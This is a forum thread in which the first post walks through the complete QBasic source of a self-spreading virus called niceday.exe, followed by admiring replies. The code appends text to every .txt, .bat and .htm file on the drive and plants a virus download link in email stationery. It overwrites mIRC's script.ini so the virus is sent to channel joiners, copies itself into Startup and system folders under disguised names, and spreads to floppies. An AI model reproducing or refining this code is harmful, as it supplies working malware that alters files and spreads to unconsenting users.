Writing the QBasic Virus
Results 1 to 5 of 5

Thread: Writing the QBasic Virus

  1. #1
    Senior Member
    Join Date
    Nov 2001
    Location
    Ireland
    Posts
    735

    Writing the QBasic Virus

    Source code/Original Post: http://www.antionline.com/showthread...216#post541952

    Writing the QBasic Virus by Jethro
    ----------------------------------

    Index:

    o Introduction
    o Decisions
    o Source Code Explanations
    o Conclusion


    Introduction
    ------------

    With a sudden ballooning in size of crappy VBS virii over the last few
    years, I noticed that I had never seen a virus written in QBasic.

    So to be original, I wrote one and you can find it in the programming
    section of technorats, called ``qbasic_virus.htm`` or something like
    that.

    I got a lot of emails (7) after I wrote that and posted it on
    AntiOnline, from people wanting me to explain the code. So, I am
    writing this text.



    Decisions
    ---------

    Decisions I had to make while writing the virus was what it was going
    to do. I wanted to make it un-destructive, because I think virii that
    actually wreak machines are both a waste of time and effort.

    Because I didn't want to use ASM in my virus (there's plenty of ASM
    virii out there), so I was restricted, in that I couldn't make it
    really polymorphic or self-modifying, without losing sight of the
    objective, that I could mimic VBS virii and make a short and sweet
    piece of code.

    First of all, it had to actually do something, so you could call it a
    virus. So I made it write a line at the end of text (*.txt) files
    (which I think is pretty harmless) and two lines at the end of batch
    (*.bat) files (one being a :: comment).

    Then came the bulk of the code, how it was to spread. I studied my
    version of Microsoft Outlook Express for a while and realised that the
    best and most effective way for it to spread would be through the
    email (*.eml) files and the Stationary (which happen to be *.htm)
    files.

    I also wanted it to spread through *.htm* files, so any web designers
    publishing web pages would have a on their pages
    which said that they were infected.

    It just so happened that I was able to mix the webpage spreading device
    and the email spreading device together, so if the virus found that it
    was infecting a page in a Microsoft directory, it would treat it as a
    Stationary file and just put a link to the virus, which was to be put
    up on some server.

    I had seen many VBS virii which spread through mIRC, so, like the
    I-Love-You virus, I put a line in the script.ini file in the mIRC
    directory (if it existed on the computer) which would DCC the virus to
    whoever joined the channel that the infected user was in.

    My last two decisions, were that I wanted the virus to spread locally
    around the infectee's computer and I wanted it to spread across floppy
    disks.

    So I wrote down on a piece of paper what I wanted it to do and I scored
    off each objective as I had completed it. Here is the source code
    (which as I have said, can be accessed through my website) and my
    explanations as to why I put something in and what it does.

    You're probably going to need at least a basic (no pun intended)
    understanding of QBasic, because this is not a QBasic tutorial.



    Source Code Explanations
    ------------------------

    ****
    ' Written by Jethro
    ' Have a Nice day!
    ****

    That part is just my intro, so anybody looking at the source code would
    know how made it and could guess what it's called (niceday.exe)

    ****
    DECLARE SUB DRAWWINDOW ()
    DECLARE SUB INFECTFILES ()
    DECLARE SUB SPREAD2MIRC ()
    DECLARE SUB REMOTESPREAD ()
    DECLARE SUB SPREAD (file2spr$, where2spr$)
    DECLARE SUB INFECTHTML ()
    DECLARE SUB IFEXIST (filen$)
    DECLARE SUB INFECTBATCH ()
    DECLARE SUB INFECTFLOPPY ()
    ****

    Just declaring the subs.

    ****
    COMMON SHARED itexist, nodrive

    itexist = 0
    nodrive = 0
    ****

    That is just so I can use those variables in every sub. ``itexist`` is
    what I am using to check if a file exists and ``nodrive`` is what I am
    using to check whether the floppy drive is funtioning

    ****
    ON ERROR GOTO ohsoz
    ****

    That is so it doesn't spit up and ugly error. How embarrising would it
    be, if a user, thinking it was just a normal program, saw "Floppy
    Drive no found" or something?

    ****
    blinks = 2

    FOR i = 1 TO blinks
    CLS
    LOCATE 5, 12: PRINT "Jethro Perazza Jones"
    LOCATE 6, 13: PRINT "Have a Nice Day Now"
    SLEEP 1
    DRAWWINDOW
    SLEEP 1
    NEXT i
    ****

    That is just my fancy entrance message. My ``DRAWWINDOW`` sub does the
    bulk of it, ie. actually drawing the window.

    ****
    INFECTFILES

    SPREAD2MIRC

    REMOTESPREAD

    INFECTHTML

    INFECTBATCH

    INFECTFLOPPY
    ****

    This is just calling the subs. When I was posting the source code, I
    was debating whether I should comment these out, so someone with no
    QBasic knowledge, but who was trying to run this anyway, wouldn't get
    it work. But I decided not to, in case I got a load of emails saying
    ``Your virus doesn't work! WAAAA!``

    ****
    ohsoz:

    errorhandler:

    SELECT CASE ERR

    CASE IS = 71
    nodrive = 1

    END SELECT

    RESUME NEXT
    ****

    This is the error handler and also works to tell the ``INFECTFLOPPY``
    sub that there is no floppy disk in the drive. Before I put in this
    error handler, I used to get BSODs, so I think it is a very welcome
    and important addition .

    ****
    SUB DRAWWINDOW
    LOCATE 4, 10: PRINT ""
    LOCATE 5, 10: PRINT ""
    LOCATE 6, 10: PRINT ""
    LOCATE 7, 10: PRINT ""
    LOCATE 4, 48: PRINT ""
    LOCATE 5, 48: PRINT ""
    LOCATE 6, 48: PRINT ""
    LOCATE 7, 48: PRINT ""
    FOR i = 11 TO 47
    LOCATE 4, i: PRINT ""
    LOCATE 7, i: PRINT ""
    NEXT i
    END SUB
    ****

    Pointless sub, just draws the window for the entrance screen. Also,
    gives you a few seconds to quit, if you accidentaly run the virus
    yourself!

    ****
    SUB IFEXIST (filen$)
    fred$ = ""
    SHELL "DIR " + filen$ + " /b>files.$$$"
    OPEN "files.$$$" FOR INPUT AS #1
    DO WHILE NOT (EOF(1))
    INPUT #1, fred$
    LOOP
    CLOSE #1: KILL "files.$$$"
    IF NOT LEN(fred$) >= 1 THEN itexist = 0
    IF LEN(fred$) >= 1 THEN itexist = 1
    END SUB
    ****

    I have to admit, this is one cool looking sub. Ugly, but cool
    nonetheless. Basically, this issues a DIR for the file in question and
    if it exists, the ``itexist`` variable is given the value 1, if not,
    it is given the value 0. Boolean-style.

    ****
    SUB INFECTBATCH
    SHELL "DIR C:\*.bat /B /S>batch.$$$"
    OPEN "batch.$$$" FOR INPUT AS #1
    DO WHILE NOT (EOF(1))
    INPUT #1, file2do$
    OPEN file2do$ FOR APPEND AS #2
    PRINT #2, ""
    PRINT #2, "echo Ran %0"
    PRINT #2, ":: Having a good day?"
    CLOSE #2
    CLOSE #1
    LOOP
    KILL "batch.$$$"
    END SUB
    ****

    This basically runs through all the batch files on the system and adds
    to lines to it. The blank line at the start just puts the text on a
    new line. "echo Ran %0" will just print out to the screen "Ran
    <program name>" and the ":: Having a good day?" is just a comment and
    will be ignored by the MS-DOS command interpreter. You can see how
    easy it would be to issue a KILL command on all the batch files, but
    that would be stupid and mean.

    ****
    SUB INFECTFILES
    PRINT "Scanning for files..."
    SHELL "DIR C:\*.txt /S /B>phy.lst"
    OPEN "phy.lst" FOR INPUT AS #1
    DO WHILE NOT (EOF(1))
    INPUT #1, phyle$
    OPEN phyle$ FOR APPEND AS #2
    PRINT #2, ""
    PRINT #2, "Jethro P. Jones says: 'Have a nice day now!'"
    CLOSE #2
    LOOP
    CLOSE #1
    KILL "phy.lst"
    PRINT "Scanning for needed drivers..."
    END SUB
    ****

    This basicallly does the same as the ``INFECTBATCH`` sub, only it adds
    one line to all *.txt files.

    ****
    SUB INFECTFLOPPY
    ON ERROR GOTO errorhandler
    SPREAD "niceday.exe", "A:\niceday.exe"
    END SUB
    ****

    This basically sends ``niceday.exe`` to the floppy disk, if it is in
    the floppy drive.

    ****
    SUB INFECTHTML
    SHELL "DIR C:\*.htm* /B /S>tempfile.$$$"
    OPEN "tempfile.$$$" FOR INPUT AS #1
    DO WHILE NOT (EOF(1))
    INPUT #1, file2do$
    OPEN file2do$ FOR APPEND AS #2
    PRINT #2, ""
    IF NOT INSTR(file2do$, "micros") THEN PRINT #2, ""
    IF INSTR(file2do$, "micros") THEN PRINT #2, "<a href=http://www.myserver.com/jethro/happyday.exe>Download this for a very happy day!</a>"
    CLOSE #2
    LOOP
    CLOSE #1
    KILL "tempfile.$$$"
    END SUB
    ****

    This infects HTML files. If they are in a Microsoft folder (like
    Stationary files), it adds a link to a program (the virus) on a
    server, if not, it just adds a comment to the page, because it's
    possibly a webpage ready for publication.

    ****
    SUB REMOTESPREAD
    SPREAD "niceday.exe", "C:\WINDOWS\niceday.exe"
    SPREAD "niceday.exe", "C:\WINDOWS\SYSTEM\winpgup.exe"
    SPREAD "niceday.exe", "C:\WINDOWS\COMMAND\win32dice.exe"
    SPREAD "niceday.exe", "C:\autoexec.exe"
    SPREAD "niceday.exe", "C:\WINDOWS\StartM~1\Progra~1\Startup\win32pgup.exe"
    SPREAD "niceday.exe", "C:\WINDOWS\Progra~1\niceday.exe"
    END SUB
    ****

    This just spreads the virus about a bit, locally in the computer.

    ****
    SUB SPREAD (file2spr$, where2spr$)
    SHELL "COPY " + file2spr$ + " " + where2spr$ + ">nul"
    END SUB
    ****

    This just helps spread the file about easily.

    ****
    SUB SPREAD2MIRC
    ON ERROR GOTO ohsoz
    IFEXIST "C:\mirc\script.ini": IF itexist = 0 THEN GOTO 5
    OPEN "C:\mirc\script.ini" FOR OUTPUT AS #1
    PRINT #1, "[script]"
    PRINT #1, "n0=on 1:JOIN:#:/.dcc send -c $nick C:\WINDOWS\niceday.exe"
    CLOSE #1
    5
    END SUB
    ****

    This adds a line to mIRC's script.ini file so it can spread easily
    through IRC.



    Conclusion
    ----------

    Even just writing this text, I can see ways of optimising the code and
    I have new ideas, so don't be suprised if you see a sequel to the
    NiceDay.exe virus.

    Have fun,
    Jethro

  2. #2
    Senior Member
    Join Date
    Apr 2002
    Posts
    324
    very nice - anyone who hasn't alread been to Jethro's technorats site I can heartily reccomend it!

    Keep up the good work Jethro!
    \"I may not agree with what you say, but I will defend to the death your right to say it.\"
    Sir Winston Churchill.

  3. #3
    Senior Member
    Join Date
    Nov 2001
    Location
    Ireland
    Posts
    735
    Ah shucks

    Originally posted here by ntsa
    very nice - anyone who hasn't alread been to Jethro's technorats site I can heartily reccomend it!

    Keep up the good work Jethro!

  4. #4
    Fastest Thing Alive s0nIc's Avatar
    Join Date
    Sep 2001
    Location
    Sydney
    Posts
    1,584
    lol dang.. brings back old memories

  5. #5
    Banned
    Join Date
    Jun 2002
    Posts
    6
    Awsome man Im just starting 2 learn QB give me a shout some time aight

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •